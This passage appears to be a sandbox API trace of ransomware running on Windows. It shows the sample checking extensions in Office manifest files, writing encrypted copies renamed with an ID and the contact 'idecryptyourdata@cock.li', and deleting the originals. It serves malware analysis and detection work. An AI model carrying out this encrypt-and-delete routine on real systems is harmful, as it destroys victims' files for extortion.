(lpString1=".ppt", lpString2=".xml") returned -1 [0059.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 104 [0059.072] lstrlenW (lpString=".zip") returned 4 [0059.072] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.072] lstrlenW (lpString=".rar") returned 4 [0059.072] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.072] lstrlenW (lpString=".bz2") returned 4 [0059.072] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.072] lstrlenW (lpString=".7z") returned 3 [0059.072] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 104 [0059.072] lstrlenW (lpString=".dbf") returned 4 [0059.072] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 104 [0059.072] lstrlenW (lpString=".1cd") returned 4 [0059.072] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 104 [0059.072] lstrlenW (lpString=".jpg") returned 4 [0059.072] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 104 [0059.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 104 [0059.072] lstrlenW (lpString=".doc") returned 4 [0059.072] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.072] lstrlenW (lpString=".docx") returned 5 [0059.073] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.073] lstrlenW (lpString=".pdf") returned 4 [0059.073] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.073] lstrlenW (lpString=".xls") returned 4 [0059.073] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.073] lstrlenW (lpString=".xlsx") returned 5 [0059.073] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.073] lstrlenW (lpString=".ppt") returned 4 [0059.073] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 104 [0059.073] lstrlenW (lpString=".zip") returned 4 [0059.073] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.073] lstrlenW (lpString=".rar") returned 4 [0059.073] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.073] lstrlenW (lpString=".bz2") returned 4 [0059.073] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.073] lstrlenW (lpString=".7z") returned 3 [0059.073] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 104 [0059.073] lstrlenW (lpString=".dbf") returned 4 [0059.073] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 104 [0059.073] lstrlenW (lpString=".1cd") returned 4 [0059.073] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 104 [0059.073] lstrlenW (lpString=".jpg") returned 4 [0059.073] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.073] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0059.073] lstrlenW (lpString="AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 53 [0059.073] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0054-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0059.074] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=1261) returned 1 [0059.074] CloseHandle (hObject=0x370) returned 1 [0059.074] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0054-0409-1000-0000000ff1ce.xml")) returned 0x220 [0059.074] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0054-0409-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0059.074] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0054-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0059.074] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.075] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.075] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0054-0409-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0059.075] GetLastError () returned 0x0 [0059.075] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x4ed, lpOverlapped=0x0) returned 1 [0059.104] WriteFile (in: hFile=0x344, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x4f0, lpOverlapped=0x0) returned 1 [0059.135] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0059.135] WriteFile (in: hFile=0x344, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x13e, lpOverlapped=0x0) returned 1 [0059.135] SetEndOfFile (hFile=0x344) returned 1 [0059.135] CloseHandle (hObject=0x344) returned 1 [0059.137] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.137] SetEndOfFile (hFile=0x370) returned 1 [0059.138] CloseHandle (hObject=0x370) returned 1 [0059.138] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0059.138] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0054-0409-1000-0000000ff1ce.xml")) returned 1 [0059.138] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 104 [0059.138] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 104 [0059.138] lstrlenW (lpString=".doc") returned 4 [0059.138] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.138] lstrlenW (lpString=".docx") returned 5 [0059.138] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.138] lstrlenW (lpString=".pdf") returned 4 [0059.138] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.139] lstrlenW (lpString=".xls") returned 4 [0059.139] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.139] lstrlenW (lpString=".xlsx") returned 5 [0059.139] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.139] lstrlenW (lpString=".ppt") returned 4 [0059.139] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 104 [0059.139] lstrlenW (lpString=".zip") returned 4 [0059.139] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.139] lstrlenW (lpString=".rar") returned 4 [0059.139] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.139] lstrlenW (lpString=".bz2") returned 4 [0059.139] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.139] lstrlenW (lpString=".7z") returned 3 [0059.139] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 104 [0059.139] lstrlenW (lpString=".dbf") returned 4 [0059.139] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 104 [0059.139] lstrlenW (lpString=".1cd") returned 4 [0059.139] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 104 [0059.139] lstrlenW (lpString=".jpg") returned 4 [0059.139] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 104 [0059.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 104 [0059.139] lstrlenW (lpString=".doc") returned 4 [0059.139] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.139] lstrlenW (lpString=".docx") returned 5 [0059.139] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.139] lstrlenW (lpString=".pdf") returned 4 [0059.139] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.139] lstrlenW (lpString=".xls") returned 4 [0059.140] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.140] lstrlenW (lpString=".xlsx") returned 5 [0059.140] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.140] lstrlenW (lpString=".ppt") returned 4 [0059.140] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 104 [0059.140] lstrlenW (lpString=".zip") returned 4 [0059.140] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.140] lstrlenW (lpString=".rar") returned 4 [0059.140] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.140] lstrlenW (lpString=".bz2") returned 4 [0059.140] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.140] lstrlenW (lpString=".7z") returned 3 [0059.140] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 104 [0059.140] lstrlenW (lpString=".dbf") returned 4 [0059.140] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 104 [0059.140] lstrlenW (lpString=".1cd") returned 4 [0059.140] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 104 [0059.140] lstrlenW (lpString=".jpg") returned 4 [0059.140] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.140] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0059.141] lstrlenW (lpString="AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 53 [0059.141] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0057-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0059.141] GetFileSizeEx (in: hFile=0x370, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=343329) returned 1 [0059.141] CloseHandle (hObject=0x370) returned 1 [0059.141] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0057-0000-1000-0000000ff1ce.xml")) returned 0x220 [0059.141] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0057-0000-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0059.141] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0057-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0059.141] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.141] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.141] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0057-0000-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0059.142] GetLastError () returned 0x0 [0059.142] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x53d21, lpOverlapped=0x0) returned 1 [0059.208] WriteFile (in: hFile=0x344, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x53d30, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x53d30, lpOverlapped=0x0) returned 1 [0059.215] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0059.215] WriteFile (in: hFile=0x344, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x13e, lpOverlapped=0x0) returned 1 [0059.215] SetEndOfFile (hFile=0x344) returned 1 [0059.269] CloseHandle (hObject=0x344) returned 1 [0059.277] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.277] SetEndOfFile (hFile=0x370) returned 1 [0059.281] CloseHandle (hObject=0x370) returned 1 [0059.281] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0059.281] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0057-0000-1000-0000000ff1ce.xml")) returned 1 [0059.282] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 104 [0059.282] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 104 [0059.282] lstrlenW (lpString=".doc") returned 4 [0059.282] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.282] lstrlenW (lpString=".docx") returned 5 [0059.282] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.282] lstrlenW (lpString=".pdf") returned 4 [0059.282] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.282] lstrlenW (lpString=".xls") returned 4 [0059.282] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.282] lstrlenW (lpString=".xlsx") returned 5 [0059.282] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.282] lstrlenW (lpString=".ppt") returned 4 [0059.282] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.282] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 104 [0059.282] lstrlenW (lpString=".zip") returned 4 [0059.282] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.282] lstrlenW (lpString=".rar") returned 4 [0059.282] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.282] lstrlenW (lpString=".bz2") returned 4 [0059.282] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.282] lstrlenW (lpString=".7z") returned 3 [0059.282] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.282] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 104 [0059.282] lstrlenW (lpString=".dbf") returned 4 [0059.283] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 104 [0059.283] lstrlenW (lpString=".1cd") returned 4 [0059.283] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 104 [0059.283] lstrlenW (lpString=".jpg") returned 4 [0059.283] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 104 [0059.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 104 [0059.283] lstrlenW (lpString=".doc") returned 4 [0059.283] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.283] lstrlenW (lpString=".docx") returned 5 [0059.283] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.283] lstrlenW (lpString=".pdf") returned 4 [0059.283] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.283] lstrlenW (lpString=".xls") returned 4 [0059.283] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.283] lstrlenW (lpString=".xlsx") returned 5 [0059.283] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.283] lstrlenW (lpString=".ppt") returned 4 [0059.283] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 104 [0059.283] lstrlenW (lpString=".zip") returned 4 [0059.283] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.283] lstrlenW (lpString=".rar") returned 4 [0059.283] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.283] lstrlenW (lpString=".bz2") returned 4 [0059.283] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.284] lstrlenW (lpString=".7z") returned 3 [0059.284] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 104 [0059.284] lstrlenW (lpString=".dbf") returned 4 [0059.284] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 104 [0059.284] lstrlenW (lpString=".1cd") returned 4 [0059.284] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 104 [0059.284] lstrlenW (lpString=".jpg") returned 4 [0059.284] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.284] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0059.284] lstrlenW (lpString="AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 53 [0059.284] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0059.294] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=357349) returned 1 [0059.294] CloseHandle (hObject=0x354) returned 1 [0059.294] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0000-1000-0000000ff1ce.xml")) returned 0x220 [0059.294] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0000-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0059.294] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0059.295] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.295] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.295] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0000-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0059.297] GetLastError () returned 0x0 [0059.297] ReadFile (in: hFile=0x354, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x573e5, lpOverlapped=0x0) returned 1 [0059.363] WriteFile (in: hFile=0x370, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x573f0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x573f0, lpOverlapped=0x0) returned 1 [0059.371] ReadFile (in: hFile=0x354, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0059.371] WriteFile (in: hFile=0x370, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x13e, lpOverlapped=0x0) returned 1 [0059.371] SetEndOfFile (hFile=0x370) returned 1 [0059.371] CloseHandle (hObject=0x370) returned 1 [0059.379] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.379] SetEndOfFile (hFile=0x354) returned 1 [0059.383] CloseHandle (hObject=0x354) returned 1 [0059.383] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft 